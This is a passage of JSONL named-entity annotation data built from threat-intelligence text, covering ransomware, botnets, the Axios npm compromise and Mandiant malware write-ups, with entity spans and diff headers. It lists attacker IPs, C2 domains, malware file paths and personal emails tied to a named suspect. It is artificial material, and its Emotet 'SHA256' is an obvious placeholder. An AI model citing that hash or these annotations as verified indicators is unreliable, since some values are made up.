"TOOL: Mimikatz": [[531, 539]], "FILEPATH: C:\\Windows\\Temp\\deploy.bat": [[608, 634]], "FILEPATH: C:\\Users\\Public\\w.exe": [[672, 693]], "IP_ADDRESS: 89.105.198.42": [[712, 725]], "IP_ADDRESS: 194.26.135.119": [[727, 741]], "IP_ADDRESS: 45.227.255.13": [[747, 760]], "TOOL: rclone": [[822, 828]], "URL: hxxps://akiradecrypt.org/recover/index.html": [[876, 919]]}, "info": {"id": "malware_00024", "source": "malware_reports"}}
25
+ {"text": "Emotet returned in November 2024 after a prolonged dormancy period following the January 2021 takedown coordinated by Europol. The new variant with SHA256 hash b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1 is distributed via malicious Excel files with XLM macros. The malware drops its payload to C:\\Windows\\SysWOW64\\randomname.dll and registers persistence through a Windows service. C2 communications use HTTP POST requests to compromised WordPress sites at 103.75.201.2, 45.76.176.10, 104.131.62.48, 158.69.222.101, and 37.44.244.177. The botnet uses a tiered architecture with Epoch 4 and Epoch 5 infrastructure. Key C2 domains include cdn-update-service.com, api-metrics-data.org, and telemetry-reports.net. The malware was observed dropping secondary payloads including SystemBC proxy bot and Bumblebee loader.", "spans": {"MALWARE: Emotet": [[0, 6]], "ORGANIZATION: Europol": [[118, 125]], "HASH: b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1": [[160, 224]], "FILEPATH: C:\\Windows\\SysWOW64\\randomname.dll": [[316, 350]], "IP_ADDRESS: 103.75.201.2": [[479, 491]], "IP_ADDRESS: 45.76.176.10": [[493, 505]], "IP_ADDRESS: 104.131.62.48": [[507, 520]], "IP_ADDRESS: 158.69.222.101": [[522, 536]], "IP_ADDRESS: 37.44.244.177": [[542, 555]], "DOMAIN: cdn-update-service.com": [[659, 681]], "DOMAIN: api-metrics-data.org": [[683, 703]], "DOMAIN: telemetry-reports.net": [[709, 730]], "MALWARE: SystemBC": [[795, 803]], "MALWARE: Bumblebee": [[818, 827]], "SYSTEM: WordPress": [[460, 469]]}, "info": {"id": "malware_00025", "source": "malware_reports"}}
data/processed/backup/llm_annotated_mitre.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_mitre_v2.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_news.jsonl ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "Tyler Robert Buchanan, a 24-year-old from Dundee, Scotland, has pleaded guilty to wire fraud conspiracy and aggravated identity theft as a senior member of the cybercrime group Scattered Spider.", "spans": {"THREAT_ACTOR: Scattered Spider": [[177, 193]], "ORGANIZATION: Scotland": [[50, 58]]}, "info": {"id": "news_00001", "source": "security_news"}}
2
+ {"text": "Buchanan admitted to participating in tens of thousands of SMS-based phishing attacks in 2022 targeting technology companies including Twilio, LastPass, DoorDash, and Mailchimp. The stolen data enabled the group to conduct SIM-swapping attacks against cryptocurrency investors.", "spans": {"ORGANIZATION: Twilio": [[135, 141]], "ORGANIZATION: LastPass": [[143, 151]], "ORGANIZATION: DoorDash": [[153, 161]], "ORGANIZATION: Mailchimp": [[167, 176]]}, "info": {"id": "news_00002", "source": "security_news"}}
3
+ {"text": "The FBI traced Buchanan through operational security failures. Investigators discovered that the same username and email address was used to register numerous phishing domains. Domain registrations logged in from a UK IP address leased to Buchanan in 2022.", "spans": {"ORGANIZATION: FBI": [[4, 7]]}, "info": {"id": "news_00003", "source": "security_news"}}
4
+ {"text": "Buchanan is the second Scattered Spider member to plead guilty. Noah Michael Urban received a 10-year sentence in 2025. Buchanan was arrested in June 2024 in Spain while boarding a flight and extradited to U.S. custody in April 2025. He faces a maximum sentence of 22 years in federal prison.", "spans": {"THREAT_ACTOR: Scattered Spider": [[23, 39]]}, "info": {"id": "news_00004", "source": "security_news"}}
5
+ {"text": "German authorities have publicly identified Daniil Maksimovich Shchukin, a 31-year-old Russian national, as UNKN, the alleged leader of major ransomware operations GandCrab and REvil. Shchukin is believed to reside in Krasnodar, Russia.", "spans": {"THREAT_ACTOR: UNKN": [[108, 112]], "MALWARE: GandCrab": [[164, 172]], "MALWARE: REvil": [[177, 182]], "ORGANIZATION: German authorities": [[0, 18]]}, "info": {"id": "news_00005", "source": "security_news"}}
6
+ {"text": "GandCrab launched in 2018 as an affiliate ransomware program, pioneering double extortion tactics. The group claimed to have extorted over $2 billion before announcing shutdown in May 2019. REvil emerged around the same time, widely believed by security experts to be GandCrab's reorganization.", "spans": {"MALWARE: GandCrab": [[0, 8], [268, 276]], "MALWARE: REvil": [[190, 195]]}, "info": {"id": "news_00006", "source": "security_news"}}
7
+ {"text": "REvil notably targeted organizations with $100 million or more in annual revenue and cyber insurance coverage. The group gained notoriety for the 2021 Kaseya attack affecting over 1,500 businesses worldwide.", "spans": {"MALWARE: REvil": [[0, 5]], "ORGANIZATION: Kaseya": [[151, 157]]}, "info": {"id": "news_00007", "source": "security_news"}}
8
+ {"text": "German Federal Criminal Police, known as BKA, released photos and identified cryptocurrency wallets containing $317,000 in illicit proceeds. Researchers found corroborating evidence linking Shchukin to the online identity Ger0in, a botnet operator from 2010-2011.", "spans": {"ORGANIZATION: BKA": [[41, 44]], "THREAT_ACTOR: Ger0in": [[222, 228]]}, "info": {"id": "news_00008", "source": "security_news"}}
9
+ {"text": "Russian military intelligence operatives associated with APT28, also known as Fancy Bear or Forest Blizzard, compromised approximately 18,000 internet routers to harvest Microsoft Office authentication tokens without deploying malware.", "spans": {"THREAT_ACTOR: APT28": [[57, 62]], "THREAT_ACTOR: Fancy Bear": [[78, 88]], "THREAT_ACTOR: Forest Blizzard": [[92, 107]], "SYSTEM: Microsoft Office": [[170, 186]]}, "info": {"id": "news_00009", "source": "security_news"}}
10
+ {"text": "The threat actors modified DNS settings on vulnerable routers, primarily older MikroTik and TP-Link SOHO devices, to redirect traffic through attacker-controlled servers. This enabled them to intercept OAuth authentication tokens from users who had already completed multi-factor authentication.", "spans": {"SYSTEM: MikroTik": [[79, 87]], "SYSTEM: TP-Link": [[92, 99]]}, "info": {"id": "news_00010", "source": "security_news"}}
11
+ {"text": "Over 200 organizations and 5,000 consumer devices were affected, with peak activity in December 2025. Primary targets included government agencies, foreign affairs ministries, and law enforcement. The attack used DNS hijacking supporting adversary-in-the-middle attacks on TLS connections.", "spans": {}, "info": {"id": "news_00011", "source": "security_news"}}
12
+ {"text": "The U.S. FCC announced in March 2026 that it would cease certifying consumer-grade routers manufactured outside the United States, citing national security concerns about poorly-secured foreign-made devices.", "spans": {"ORGANIZATION: FCC": [[9, 12]]}, "info": {"id": "news_00012", "source": "security_news"}}
13
+ {"text": "TeamPCP, a financially motivated cybercrime group that began compromising cloud environments in December 2025, launched the CanisterWorm wiper campaign targeting Iran. The attack materialized the weekend of March 19-23, 2026.", "spans": {"THREAT_ACTOR: TeamPCP": [[0, 7]], "MALWARE: CanisterWorm": [[124, 136]]}, "info": {"id": "news_00013", "source": "security_news"}}
14
+ {"text": "The campaign followed a supply chain attack on Trivy vulnerability scanner from Aqua Security. TeamPCP uses Internet Computer Protocol canisters, blockchain-based smart contracts resistant to takedowns, to orchestrate campaigns.", "spans": {"TOOL: Trivy": [[47, 52]], "ORGANIZATION: Aqua Security": [[80, 93]], "THREAT_ACTOR: TeamPCP": [[95, 102]]}, "info": {"id": "news_00014", "source": "security_news"}}
15
+ {"text": "The malware targets systems with Iran's timezone or Farsi language settings, destroying local data or wiping entire Kubernetes cluster nodes for Iranian targets. Azure and AWS account for 97 percent of compromised servers.", "spans": {"SYSTEM: Kubernetes": [[116, 126]], "SYSTEM: Azure": [[162, 167]], "SYSTEM: AWS": [[172, 175]]}, "info": {"id": "news_00015", "source": "security_news"}}
16
+ {"text": "Rather than novel exploits, TeamPCP weaponizes exposed Docker APIs, Kubernetes clusters, Redis servers, and the React2Shell vulnerability through large-scale automation. The group also targeted the KICS vulnerability scanner from Checkmarx.", "spans": {"THREAT_ACTOR: TeamPCP": [[28, 35]], "SYSTEM: Docker": [[55, 61]], "SYSTEM: Kubernetes": [[68, 78]], "SYSTEM: Redis": [[89, 94]], "VULNERABILITY: React2Shell": [[112, 123]], "TOOL: KICS": [[198, 202]], "ORGANIZATION: Checkmarx": [[230, 239]]}, "info": {"id": "news_00016", "source": "security_news"}}
17
+ {"text": "Security researchers from Aikido, Flare, and Wiz documented the CanisterWorm campaign. Charlie Eriksen noted the malware was rapidly changing and suggested the Iran targeting might represent attention-seeking behavior.", "spans": {"ORGANIZATION: Aikido": [[26, 32]], "ORGANIZATION: Flare": [[34, 39]], "ORGANIZATION: Wiz": [[45, 48]], "MALWARE: CanisterWorm": [[64, 76]]}, "info": {"id": "news_00017", "source": "security_news"}}
18
+ {"text": "The U.S. Justice Department, working with Canadian and German authorities, dismantled infrastructure supporting four major IoT botnets named Aisuru, Kimwolf, JackSkid, and Mossad that had compromised over 3 million devices.", "spans": {"ORGANIZATION: Justice Department": [[9, 27]], "MALWARE: Aisuru": [[141, 147]], "MALWARE: Kimwolf": [[149, 156]], "MALWARE: JackSkid": [[158, 166]], "MALWARE: Mossad": [[172, 178]]}, "info": {"id": "news_00018", "source": "security_news"}}
19
+ {"text": "Aisuru issued more than 200,000 attack commands. JackSkid launched at least 90,000 attacks. Kimwolf conducted over 25,000 attack commands. Mossad was responsible for approximately 1,000 digital sieges against Department of Defense systems.", "spans": {"MALWARE: Aisuru": [[0, 6]], "MALWARE: JackSkid": [[49, 57]], "MALWARE: Kimwolf": [[92, 99]], "MALWARE: Mossad": [[139, 145]], "ORGANIZATION: Department of Defense": [[209, 230]]}, "info": {"id": "news_00019", "source": "security_news"}}
20
+ {"text": "The Defense Criminal Investigative Service executed seizure warrants targeting U.S.-registered domains and virtual servers. The FBI's Anchorage Field Office and the DOJ collaborated with nearly two dozen technology companies.", "spans": {"ORGANIZATION: Defense Criminal Investigative Service": [[4, 42]], "ORGANIZATION: FBI": [[128, 131]], "ORGANIZATION: DOJ": [[165, 168]]}, "info": {"id": "news_00020", "source": "security_news"}}
21
+ {"text": "Aisuru emerged in late 2024. By October 2025, it spawned Kimwolf, which featured novel propagation methods targeting devices behind internal network protections. Security firm Synthient publicly disclosed this vulnerability on January 2, 2026.", "spans": {"MALWARE: Aisuru": [[0, 6]], "MALWARE: Kimwolf": [[57, 64]], "ORGANIZATION: Synthient": [[176, 185]]}, "info": {"id": "news_00021", "source": "security_news"}}
22
+ {"text": "Recent Trigona ransomware campaigns have introduced a custom exfiltration utility named uploader_client.exe that enhances their data-stealing capabilities, according to Symantec researchers.", "spans": {"MALWARE: Trigona": [[7, 14]], "TOOL: uploader_client.exe": [[88, 107]], "ORGANIZATION: Symantec": [[169, 177]]}, "info": {"id": "news_00022", "source": "security_news"}}
23
+ {"text": "The exfiltration tool supports five simultaneous connections per file for accelerated data exfiltration. It changes TCP connections after every 2GB of traffic to evade detection and can filter file types to exclude large, low-value media files.", "spans": {}, "info": {"id": "news_00023", "source": "security_news"}}
24
+ {"text": "The Trigona threat actors deploy Huorong Network Security Suite's HRSword kernel driver and use security-disabling tools including PCHunter, Gmer, YDark, WKTools, DumpGuard, and StpProcessMonitorByovd.", "spans": {"MALWARE: Trigona": [[4, 11]], "TOOL: HRSword": [[66, 73]], "TOOL: PCHunter": [[131, 139]], "TOOL: Gmer": [[141, 145]], "TOOL: YDark": [[147, 152]], "TOOL: WKTools": [[154, 161]], "TOOL: DumpGuard": [[163, 172]], "TOOL: StpProcessMonitorByovd": [[178, 200]]}, "info": {"id": "news_00024", "source": "security_news"}}
25
+ {"text": "They leverage PowerRun for privilege escalation, deploy AnyDesk for remote access, and execute Mimikatz and Nirsoft utilities for credential harvesting. Trigona launched as a double-extortion operation in October 2022, demanding Monero cryptocurrency.", "spans": {"TOOL: PowerRun": [[14, 22]], "TOOL: AnyDesk": [[56, 63]], "TOOL: Mimikatz": [[95, 103]], "TOOL: Nirsoft": [[108, 115]], "MALWARE: Trigona": [[153, 160]]}, "info": {"id": "news_00025", "source": "security_news"}}
26
+ {"text": "While Ukrainian activists disrupted the Trigona gang in October 2023, recent activity suggests operational resumption. The shift to proprietary tooling indicates efforts to maintain a lower profile during critical attack phases.", "spans": {"MALWARE: Trigona": [[40, 47]]}, "info": {"id": "news_00026", "source": "security_news"}}
27
+ {"text": "The UK's National Cyber Security Centre, known as NCSC-UK, alongside international partners from nine nations, issued a joint advisory alerting organizations to China-linked threat actors deploying massive botnets of compromised consumer devices.", "spans": {"ORGANIZATION: NCSC-UK": [[50, 57]]}, "info": {"id": "news_00027", "source": "security_news"}}
28
+ {"text": "The Raptor Train botnet infected over 260,000 devices globally in 2024, linked to state-sponsored group Flax Typhoon and Integrity Technology Group. The FBI disrupted the botnet in September 2024.", "spans": {"MALWARE: Raptor Train": [[4, 16]], "THREAT_ACTOR: Flax Typhoon": [[104, 116]], "ORGANIZATION: Integrity Technology Group": [[121, 147]], "ORGANIZATION: FBI": [[153, 156]]}, "info": {"id": "news_00028", "source": "security_news"}}
29
+ {"text": "The KV-Botnet was used by the Volt Typhoon group and was primarily composed of outdated Cisco and Netgear routers. The FBI disrupted it in January 2024, though revival attempts began in late 2024.", "spans": {"MALWARE: KV-Botnet": [[4, 13]], "THREAT_ACTOR: Volt Typhoon": [[30, 42]], "SYSTEM: Cisco": [[88, 93]], "SYSTEM: Netgear": [[98, 105]], "ORGANIZATION: FBI": [[119, 122]]}, "info": {"id": "news_00029", "source": "security_news"}}
30
+ {"text": "Security agencies from the US, Australia, Canada, Germany, Japan, Netherlands, New Zealand, Spain, and Sweden signed the advisory recommending multifactor authentication, network edge mapping, dynamic threat feeds, IP allowlists, and zero-trust controls.", "spans": {}, "info": {"id": "news_00030", "source": "security_news"}}
31
+ {"text": "A previously undocumented state-backed group named GopherWhisper, linked to China, has been active since at least 2023. Security firm ESET identified the group targeting government entities in Mongolia.", "spans": {"THREAT_ACTOR: GopherWhisper": [[51, 64]], "ORGANIZATION: ESET": [[134, 138]]}, "info": {"id": "news_00031", "source": "security_news"}}
32
+ {"text": "GopherWhisper employs legitimate services for command-and-control communications, including Microsoft 365 Outlook, Slack, and Discord, alongside custom infrastructure using OpenSSL over port 443.", "spans": {"THREAT_ACTOR: GopherWhisper": [[0, 13]], "SYSTEM: Microsoft 365 Outlook": [[92, 113]], "SYSTEM: Slack": [[115, 120]], "SYSTEM: Discord": [[126, 133]], "TOOL: OpenSSL": [[173, 180]]}, "info": {"id": "news_00032", "source": "security_news"}}
33
+ {"text": "GopherWhisper deployed multiple Go-based and C++ tools including LaxGopher, a Go backdoor using private Slack servers for command execution, and RatGopher, a Discord-based backdoor for command execution.", "spans": {"THREAT_ACTOR: GopherWhisper": [[0, 13]], "MALWARE: LaxGopher": [[65, 74]], "MALWARE: RatGopher": [[145, 154]]}, "info": {"id": "news_00033", "source": "security_news"}}
34
+ {"text": "The group also used BoxOfFriends, which leverages Microsoft Graph API via Outlook draft emails, and SSLORDoor, a C++ backdoor with file operation capabilities. JabGopher is a process injector for LaxGopher deployment.", "spans": {"MALWARE: BoxOfFriends": [[20, 32]], "MALWARE: SSLORDoor": [[100, 109]], "MALWARE: JabGopher": [[160, 169]], "MALWARE: LaxGopher": [[196, 205]]}, "info": {"id": "news_00034", "source": "security_news"}}
35
+ {"text": "FriendDelivery is a DLL loader for BoxOfFriends deployment, and CompactGopher handles data compression and exfiltration by uploading stolen data to file.io. ESET telemetry documented 12 compromised systems within a Mongolian government institution.", "spans": {"MALWARE: FriendDelivery": [[0, 14]], "MALWARE: BoxOfFriends": [[35, 47]], "MALWARE: CompactGopher": [[64, 77]], "DOMAIN: file.io": [[148, 155]], "ORGANIZATION: ESET": [[157, 161]]}, "info": {"id": "news_00035", "source": "security_news"}}
36
+ {"text": "Stryker, a Michigan-based medical technology company with $25 billion in global sales, experienced a significant cyberattack on March 11, 2026. The assault affected operations across 79 countries, forcing over 5,000 workers home in Ireland.", "spans": {"ORGANIZATION: Stryker": [[0, 7]]}, "info": {"id": "news_00036", "source": "security_news"}}
37
+ {"text": "Perpetrators exploited Microsoft Intune to issue a remote wipe command against all connected devices, affecting approximately 200,000 systems, servers, and mobile devices.", "spans": {"SYSTEM: Microsoft Intune": [[23, 39]]}, "info": {"id": "news_00037", "source": "security_news"}}
38
+ {"text": "The Iran-linked hacktivist group Handala claimed responsibility. Palo Alto Networks associates Handala with Iran's Ministry of Intelligence and Security, known as MOIS, and links it to Void Manticore.", "spans": {"THREAT_ACTOR: Handala": [[33, 40], [95, 102]], "ORGANIZATION: Palo Alto Networks": [[65, 83]], "ORGANIZATION: MOIS": [[163, 167]], "THREAT_ACTOR: Void Manticore": [[185, 199]]}, "info": {"id": "news_00038", "source": "security_news"}}
39
+ {"text": "Microsoft addressed 167 security flaws in the April 2026 Patch Tuesday release. Critical vulnerabilities included CVE-2026-32201, a SharePoint Server zero-day enabling content spoofing and phishing attacks.", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "CVE_ID: CVE-2026-32201": [[114, 128]], "SYSTEM: SharePoint Server": [[132, 149]]}, "info": {"id": "news_00039", "source": "security_news"}}
40
+ {"text": "The BlueHammer vulnerability, tracked as CVE-2026-33825, is a Windows Defender privilege escalation flaw with publicly released exploit code. Adobe Reader was also affected by CVE-2026-34621 with active exploitation dating back to November 2025.", "spans": {"VULNERABILITY: BlueHammer": [[4, 14]], "CVE_ID: CVE-2026-33825": [[41, 55]], "SYSTEM: Windows Defender": [[62, 78]], "SYSTEM: Adobe Reader": [[142, 154]], "CVE_ID: CVE-2026-34621": [[176, 190]]}, "info": {"id": "news_00040", "source": "security_news"}}
41
+ {"text": "Google Chrome patched its fourth zero-day of 2026, including CVE-2026-5281, along with 20 other security holes. Satnam Narang from Tenable noted this represents the second-biggest Patch Tuesday ever for Microsoft.", "spans": {"SYSTEM: Google Chrome": [[0, 13]], "CVE_ID: CVE-2026-5281": [[61, 74]], "ORGANIZATION: Tenable": [[131, 138]], "ORGANIZATION: Microsoft": [[203, 212]]}, "info": {"id": "news_00041", "source": "security_news"}}
42
+ {"text": "CISA added CVE-2026-33825 to the Known Exploited Vulnerabilities catalog on April 22. Federal agencies have until May 7, 2026 to apply patches. The researcher known as Chaotic Eclipse publicly released proof-of-concept code one week prior, protesting MSRC's disclosure process.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "CVE_ID: CVE-2026-33825": [[11, 25]], "THREAT_ACTOR: Chaotic Eclipse": [[168, 183]], "ORGANIZATION: MSRC": [[251, 255]]}, "info": {"id": "news_00042", "source": "security_news"}}
43
+ {"text": "Huntress Labs confirmed attackers were exploiting BlueHammer and two related zero-days named RedSun and UnDefend in real attacks, with evidence suggesting hands-on-keyboard threat actor activity and infrastructure linked to Russia.", "spans": {"ORGANIZATION: Huntress Labs": [[0, 13]], "VULNERABILITY: BlueHammer": [[50, 60]], "VULNERABILITY: RedSun": [[93, 99]], "VULNERABILITY: UnDefend": [[104, 112]]}, "info": {"id": "news_00043", "source": "security_news"}}
44
+ {"text": "Security researchers from Socket and StepSecurity identified a self-propagating supply chain attack targeting npm packages from Namastex Labs. The malware automatically spreads through compromised publishing credentials.", "spans": {"ORGANIZATION: Socket": [[26, 32]], "ORGANIZATION: StepSecurity": [[37, 49]], "ORGANIZATION: Namastex Labs": [[128, 141]]}, "info": {"id": "news_00044", "source": "security_news"}}
45
+ {"text": "At least 16 Namastex packages were compromised, including @automagik/genie, pgserve, and @fairwords/websocket. The malware functions as a supply-chain worm that searches for npm publishing tokens in environment variables and configuration files.", "spans": {"ORGANIZATION: Namastex": [[12, 20]]}, "info": {"id": "news_00045", "source": "security_news"}}
46
+ {"text": "The attack collects authentication tokens, API keys, SSH keys, cloud service credentials, CI/CD system credentials, and LLM platform tokens. It also targets browser data from Chrome and Firefox and cryptocurrency wallet extensions including MetaMask, Exodus, Atomic Wallet, and Phantom.", "spans": {"SYSTEM: Chrome": [[175, 181]], "SYSTEM: Firefox": [[186, 193]], "SYSTEM: MetaMask": [[241, 249]], "SYSTEM: Exodus": [[251, 257]], "SYSTEM: Atomic Wallet": [[259, 272]], "SYSTEM: Phantom": [[278, 285]]}, "info": {"id": "news_00046", "source": "security_news"}}
47
+ {"text": "If PyPI credentials are found, the malware deploys similar attacks against Python packages using .pth-based payloads. The multi-ecosystem capability makes this one of the most sophisticated supply chain attacks observed in 2026.", "spans": {"SYSTEM: PyPI": [[3, 7]]}, "info": {"id": "news_00047", "source": "security_news"}}
48
+ {"text": "Brian Krebs's investigation identifies Dort, the operator of the Kimwolf botnet, as Jacob Butler from Ottawa, Canada, born August 2003. Butler used the primary email jay.miner232@gmail.com and secondary email jacobbutler803@gmail.com.", "spans": {"THREAT_ACTOR: Dort": [[39, 43]], "MALWARE: Kimwolf": [[65, 72]], "EMAIL: jay.miner232@gmail.com": [[166, 188]], "EMAIL: jacobbutler803@gmail.com": [[209, 233]]}, "info": {"id": "news_00048", "source": "security_news"}}
49
+ {"text": "The investigation traces multiple usernames to Butler including CPacket, M1CE, DortDev, MemeClient, Uubuntuu, and Dorted. Butler was a member of the LAPSUS$ group in 2022 using the alias DortDev.", "spans": {"THREAT_ACTOR: CPacket": [[64, 71]], "THREAT_ACTOR: DortDev": [[79, 86], [187, 194]], "THREAT_ACTOR: LAPSUS$": [[149, 156]]}, "info": {"id": "news_00049", "source": "security_news"}}
50
+ {"text": "Butler allegedly worked with accomplice Qoft to create Dortsolver, a CAPTCHA-bypassing tool, and develop disposable email services. They reportedly stole approximately $250,000 in Xbox Game Pass accounts.", "spans": {"THREAT_ACTOR: Qoft": [[40, 44]], "TOOL: Dortsolver": [[55, 65]]}, "info": {"id": "news_00050", "source": "security_news"}}
51
+ {"text": "After vulnerability disclosures weakened Kimwolf's spread, Dort coordinated harassment campaigns including DDoS attacks, doxing, email flooding, and swatting threats against security researcher Benjamin Brundage and journalist Brian Krebs.", "spans": {"MALWARE: Kimwolf": [[41, 48]], "THREAT_ACTOR: Dort": [[59, 63]]}, "info": {"id": "news_00051", "source": "security_news"}}
data/processed/backup/llm_annotated_nvd.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_nvd_v2.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_vendor_blogs.jsonl ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "UNC6692 launched a mass email campaign to create urgency, followed by a phishing message via Microsoft Teams impersonating IT helpdesk staff. Victims were directed to click a link for an \"email spam patch.\" Users downloaded a renamed AutoHotKey binary and script from an AWS S3 bucket. AutoHotKey executed the script, establishing initial reconnaissance. The SNOWBELT malicious browser extension was then installed on victim machines.", "spans": {"THREAT_ACTOR: UNC6692": [[0, 7]], "SYSTEM: Microsoft Teams": [[93, 108]], "TOOL: AutoHotKey": [[234, 244], [286, 296]], "MALWARE: SNOWBELT": [[359, 367]], "SYSTEM: AWS S3": [[271, 277]]}, "info": {"id": "mandiant_00001", "source": "vendor_blogs"}}
2
+ {"text": "SNOWBELT is a JavaScript-based Chromium browser extension backdoor that intercepts commands and maintains persistence through Service Worker Alarms. It communicates with command-and-control servers via a time-based domain generation algorithm targeting AWS S3 buckets. The extension hijacks browser sessions and exfiltrates cookies and credentials.", "spans": {"MALWARE: SNOWBELT": [[0, 8]], "SYSTEM: Chromium": [[31, 39]], "SYSTEM: AWS S3": [[253, 259]]}, "info": {"id": "mandiant_00002", "source": "vendor_blogs"}}
3
+ {"text": "SNOWGLAZE is a Python tunneler that creates WebSocket connections to command-and-control infrastructure hosted on Heroku, enabling SOCKS proxy operations and masking traffic with JSON and Base64 encoding. The tunneler allows threat actors to route traffic through compromised endpoints.", "spans": {"MALWARE: SNOWGLAZE": [[0, 9]], "SYSTEM: Heroku": [[114, 120]]}, "info": {"id": "mandiant_00003", "source": "vendor_blogs"}}
4
+ {"text": "SNOWBASIN is a Python bindshell operating as a local HTTP server on port 8000, providing remote command execution, screenshot capture, and file exfiltration capabilities. After establishing the browser foothold, UNC6692 scanned internal networks for ports 135, 445, and 3389. The attackers used PsExec for lateral movement via the SNOWGLAZE tunnel.", "spans": {"MALWARE: SNOWBASIN": [[0, 9]], "THREAT_ACTOR: UNC6692": [[212, 219]], "TOOL: PsExec": [[295, 301]], "MALWARE: SNOWGLAZE": [[331, 340]]}, "info": {"id": "mandiant_00004", "source": "vendor_blogs"}}
5
+ {"text": "UNC6692 extracted LSASS memory for credential harvesting and employed Pass-The-Hash techniques to reach domain controllers. They used FTK Imager to extract the Active Directory database NTDS.dit and registry hives. Data was exfiltrated via LimeWire. The campaign abused legitimate cloud services including AWS S3 and Heroku for command-and-control and payload delivery.", "spans": {"THREAT_ACTOR: UNC6692": [[0, 7]], "TOOL: FTK Imager": [[134, 144]], "FILEPATH: NTDS.dit": [[186, 194]], "TOOL: LimeWire": [[240, 248]], "SYSTEM: AWS S3": [[306, 312]], "SYSTEM: Heroku": [[317, 323]], "SYSTEM: Active Directory": [[160, 176]]}, "info": {"id": "mandiant_00005", "source": "vendor_blogs"}}
6
+ {"text": "The BRICKSTORM campaign targets VMware vSphere infrastructure, specifically vCenter Server Appliance and ESXi hypervisors. By establishing persistence at the virtualization layer below guest operating systems, threat actors exploit weak security architecture, identity design gaps, and limited visibility within the virtualization layer. Custom in-memory malware like BRICKSTORM achieves dwell times near 400 days on compromised hosts.", "spans": {"MALWARE: BRICKSTORM": [[4, 14], [368, 378]], "SYSTEM: VMware vSphere": [[32, 46]], "SYSTEM: vCenter Server Appliance": [[76, 100]], "SYSTEM: ESXi": [[105, 109]]}, "info": {"id": "mandiant_00006", "source": "vendor_blogs"}}
7
+ {"text": "Mandiant recommends implementing VMware vSphere STIG standards and applying strict patching strategies. Key controls include MFA, role-based access control, and SSH restrictions. Organizations should mandate VM encryption for Tier-0 assets such as domain controllers and credential repositories. The Mandiant vCenter Hardening Script is available at https://github.com/mandiant/vcsa-hardening-tool for automating security configurations.", "spans": {"ORGANIZATION: Mandiant": [[0, 8], [300, 308]], "SYSTEM: VMware vSphere": [[33, 47]], "URL: https://github.com/mandiant/vcsa-hardening-tool": [[350, 397]]}, "info": {"id": "mandiant_00007", "source": "vendor_blogs"}}
8
+ {"text": "Defenders should disable shell access for the vpxuser account on ESXi 8.0 hosts using the command esxcli system account set. Implement VLAN segmentation isolating management infrastructure and deploy host-based firewalls on vCenter Server Appliance and ESXi with default-deny policies. Block SSH on port 22 and VAMI on port 5480 from unauthorized sources.", "spans": {"SYSTEM: ESXi": [[65, 69], [253, 257]], "SYSTEM: vCenter Server Appliance": [[224, 248]]}, "info": {"id": "mandiant_00008", "source": "vendor_blogs"}}
9
+ {"text": "Google Threat Intelligence Group disclosed a critical supply chain attack where North Korea-nexus threat actor UNC1069 compromised the popular Axios NPM package on March 31, 2026. The attack introduced a malicious dependency called plain-crypto-js into Axios versions 1.14.1 and 0.30.4, which are downloaded over 100 million times weekly.", "spans": {"ORGANIZATION: Google Threat Intelligence Group": [[0, 32]], "THREAT_ACTOR: UNC1069": [[111, 118]], "SYSTEM: Axios": [[143, 148], [253, 258]], "MALWARE: plain-crypto-js": [[232, 247]]}, "info": {"id": "mandiant_00009", "source": "vendor_blogs"}}
10
+ {"text": "The Axios maintainer account was compromised, with the email changed to ifstap@proton.me. A malicious postinstall hook was added to automatically execute code when the package is installed. The setup.js file uses XOR and Base64 obfuscation to conceal command-and-control URLs. The malware, tracked as SILKBELL, detects the operating system and delivers platform-specific payloads.", "spans": {"EMAIL: ifstap@proton.me": [[72, 88]], "MALWARE: SILKBELL": [[301, 309]], "SYSTEM: Axios": [[4, 9]]}, "info": {"id": "mandiant_00010", "source": "vendor_blogs"}}
11
+ {"text": "On Windows, SILKBELL copies powershell.exe to %PROGRAMDATA%\\wt.exe and downloads a PowerShell script via curl to the temp directory. On macOS, it downloads a Mach-O binary to /Library/Caches/com.apple.act.mond and launches via zsh. On Linux, it downloads a Python backdoor to /tmp/ld.py.", "spans": {"MALWARE: SILKBELL": [[12, 20]], "SYSTEM: Windows": [[3, 10]], "FILEPATH: %PROGRAMDATA%\\wt.exe": [[46, 66]], "FILEPATH: /Library/Caches/com.apple.act.mond": [[175, 209]], "FILEPATH: /tmp/ld.py": [[276, 286]], "SYSTEM: macOS": [[136, 141]], "SYSTEM: Linux": [[235, 240]]}, "info": {"id": "mandiant_00011", "source": "vendor_blogs"}}
12
+ {"text": "The deployed WAVESHAPER.V2 backdoor supports reconnaissance, command execution, PE injection, shell commands, and file enumeration. It extracts hostname, username, OS version, and running processes. On Windows, it creates hidden batch files and registry entries for persistence. Backdoor commands include kill, rundir, runscript, and peinject.", "spans": {"MALWARE: WAVESHAPER.V2": [[13, 26]], "SYSTEM: Windows": [[202, 209]]}, "info": {"id": "mandiant_00012", "source": "vendor_blogs"}}
13
